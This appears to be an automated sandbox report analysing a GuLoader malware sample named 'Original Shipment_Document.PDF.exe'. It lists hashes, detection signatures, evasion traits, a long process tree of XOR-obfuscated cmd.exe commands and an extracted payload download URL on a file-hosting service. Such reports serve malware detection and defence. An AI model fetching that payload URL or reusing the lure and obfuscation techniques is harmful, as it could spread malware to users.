Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Original Shipment_Document.PDF.exe

Overview

General Information

Sample Name:Original Shipment_Document.PDF.exe
Analysis ID:679174
MD5:626cdeaa4696c819fd07921073f6c740
SHA1:b094f5e4c3792a05b7f307ad78d2e52cfcbf87b4
SHA256:d8519cee2bbf5c257375b339d530b33f275db40c06de0f96911eb5b4f207f2c5
Tags:exeguloader
Infos:

Detection

GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Initial sample is a PE file and has a suspicious name
Mass process execution to delay analysis
Obfuscated command line found
Tries to detect virtualization through RDTSC time measurements
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
PE file contains strange resources
Drops PE files
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Too many similar processes found
PE / OLE file has an invalid certificate
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Original Shipment_Document.PDF.exe (PID: 3516 cmdline: "C:\Users\user\Desktop\Original Shipment_Document.PDF.exe" MD5: 626CDEAA4696C819FD07921073F6C740)
    • cmd.eXe (PID: 5672 cmdline: cmd.eXe /c SeT /a "0x721C070B^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 4668 cmdline: cmd.eXe /c SeT /a "0x7C156677^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 4552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • Conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 2980 cmdline: cmd.eXe /c SeT /a "0x03631637^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 2952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • Conhost.exe (PID: 5636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • Conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • Conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 5736 cmdline: cmd.eXe /c SeT /a "0x5C382120^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 5628 cmdline: cmd.eXe /c SeT /a "0x7F303920^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 3204 cmdline: cmd.eXe /c SeT /a "0x78713865^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 5920 cmdline: cmd.eXe /c SeT /a "0x4B6D7569^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 6024 cmdline: cmd.eXe /c SeT /a "0x19307575^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 2996 cmdline: cmd.eXe /c SeT /a "0x41616575^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 6080 cmdline: cmd.eXe /c SeT /a "0x09696575^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 4668 cmdline: cmd.eXe /c SeT /a "0x0975752C^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.eXe (PID: 2980 cmdline: cmd.eXe /c SeT /a "0x19697965^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.eXe (PID: 5696 cmdline: cmd.eXe /c SeT /a "0x49796569^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 1104 cmdline: cmd.eXe /c SeT /a "0x19307571^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 5772 cmdline: cmd.eXe /c SeT /a "0x15793C65^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 6012 cmdline: cmd.eXe /c SeT /a "0x09216D75^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 6124 cmdline: cmd.eXe /c SeT /a "0x15793C65^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 5892 cmdline: cmd.eXe /c SeT /a "0x09703C6B^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 2344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 5640 cmdline: cmd.eXe /c SeT /a "0x4B6C7578^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.eXe (PID: 2216 cmdline: cmd.eXe /c SeT /a "0x721C070B^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 2236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 5464 cmdline: cmd.eXe /c SeT /a "0x7C156677^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 1220 cmdline: cmd.eXe /c SeT /a "0x0363032C^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 4264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 6040 cmdline: cmd.eXe /c SeT /a "0x4B2D2024^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 5144 cmdline: cmd.eXe /c SeT /a "0x55183929^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 6056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 2196 cmdline: cmd.eXe /c SeT /a "0x563A7D2C^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 5524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 6088 cmdline: cmd.eXe /c SeT /a "0x09753C65^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 1428 cmdline: cmd.eXe /c SeT /a "0x09216475^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 3920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Conhost.exe (PID: 5920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 4700 cmdline: cmd.eXe /c SeT /a "0x09696575^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 2244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 5128 cmdline: cmd.eXe /c SeT /a "0x15793C65^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 6088 cmdline: cmd.eXe /c SeT /a "0x09216675^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.eXe (PID: 1428 cmdline: cmd.eXe /c SeT /a "0x09697965^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.eXe (PID: 4588 cmdline: cmd.eXe /c SeT /a "0x5079653D^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 1892 cmdline: cmd.eXe /c SeT /a "0x0D697C35^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 3920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 5828 cmdline: cmd.eXe /c SeT /a "0x172B6478^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 5784 cmdline: cmd.eXe /c SeT /a "0x721C070B^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 2536 cmdline: cmd.eXe /c SeT /a "0x7C156677^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 6108 cmdline: cmd.eXe /c SeT /a "0x03630620^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 2952 cmdline: cmd.eXe /c SeT /a "0x4D1F3C29^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.eXe (PID: 5312 cmdline: cmd.eXe /c SeT /a "0x5C093A2C^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 5888 cmdline: cmd.eXe /c SeT /a "0x572D3037^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 5124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 2644 cmdline: cmd.eXe /c SeT /a "0x11307537^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 2944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 1296 cmdline: cmd.eXe /c SeT /a "0x0C75752C^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 4596 cmdline: cmd.eXe /c SeT /a "0x19686375^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 4812 cmdline: cmd.eXe /c SeT /a "0x09697569^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 3416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 2660 cmdline: cmd.eXe /c SeT /a "0x19307575^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 3280 cmdline: cmd.eXe /c SeT /a "0x15307575^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 6108 cmdline: cmd.eXe /c SeT /a "0x10307B37^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.eXe (PID: 5184 cmdline: cmd.eXe /c SeT /a "0x0A64721C^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 4400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 6028 cmdline: cmd.eXe /c SeT /a "0x721C070B^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 2944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 2952 cmdline: cmd.eXe /c SeT /a "0x7C156677^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.eXe (PID: 3400 cmdline: cmd.eXe /c SeT /a "0x03630720^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 6116 cmdline: cmd.eXe /c SeT /a "0x583D132C^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 1524 cmdline: cmd.eXe /c SeT /a "0x553C7D2C^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 4504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 4532 cmdline: cmd.eXe /c SeT /a "0x4B6C7965^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 3812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 908 cmdline: cmd.eXe /c SeT /a "0x50792774^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 4708 cmdline: cmd.eXe /c SeT /a "0x15793C65^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 1332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 1128 cmdline: cmd.eXe /c SeT /a "0x09216475^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 3876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 4920 cmdline: cmd.eXe /c SeT /a "0x09696575^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 4916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 5464 cmdline: cmd.eXe /c SeT /a "0x15733C65^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.eXe (PID: 4336 cmdline: cmd.eXe /c SeT /a "0x0975752C^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 4712 cmdline: cmd.eXe /c SeT /a "0x19697C2C^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 2988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 4600 cmdline: cmd.eXe /c SeT /a "0x172B6678^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 2644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 4772 cmdline: cmd.eXe /c SeT /a "0x4C2A3037^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • Conhost.exe (PID: 3212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.eXe (PID: 2952 cmdline: cmd.eXe /c SeT /a "0x0A6B6F7F^962155845" MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1RTjXzM3oLxMQRuQuQg9TR4kX_hPJtp2r"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.520490666.00000000030F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: Original Shipment_Document.PDF.exeVirustotal: Detection: 32%Perma Link
    Source: Original Shipment_Document.PDF.exeReversingLabs: Detection: 22%
    Source: 00000000.00000002.520490666.00000000030F0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1RTjXzM3oLxMQRuQuQg9TR4kX_hPJtp2r"}
    Source: Original Shipment_Document.PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: Original Shipment_Document.PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

    Networking

    barindex
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1RTjXzM3oLxMQRuQuQg9TR4kX_hPJtp2r
    Source: Original Shipment_Document.PDF.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056A8
    Source: Conhost.exeProcess created: 58
    Source: cmd.eXeProcess created: 116

    System Summary

    barindex
    Initial sample is a PE file and has a suspicious name
    Source: initial sampleStatic PE information: Filename: Original Shipment_Document.PDF.exe
    Executable has a suspicious name (potential lure to open the executable)
    Source: Original Shipment_Document.PDF.exeStatic file information: Suspicious name
    Source: Original Shipment_Document.PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: Original Shipment_Document.PDF.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_00406BFE0_2_00406BFE
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_6EAC1BFF0_2_6EAC1BFF
    Source: Original Shipment_Document.PDF.exeStatic PE information: invalid certificate
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess Stats: CPU usage > 98%
    Source: Original Shipment_Document.PDF.exeVirustotal: Detection: 32%
    Source: Original Shipment_Document.PDF.exeReversingLabs: Detection: 22%
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeFile read: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeJump to behavior
    Source: Original Shipment_Document.PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe "C:\Users\user\Desktop\Original Shipment_Document.PDF.exe"
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03631637^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C382120^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7F303920^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x78713865^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6D7569^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
    Source: C:\Windows\SysWOW64\cmd.eXeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
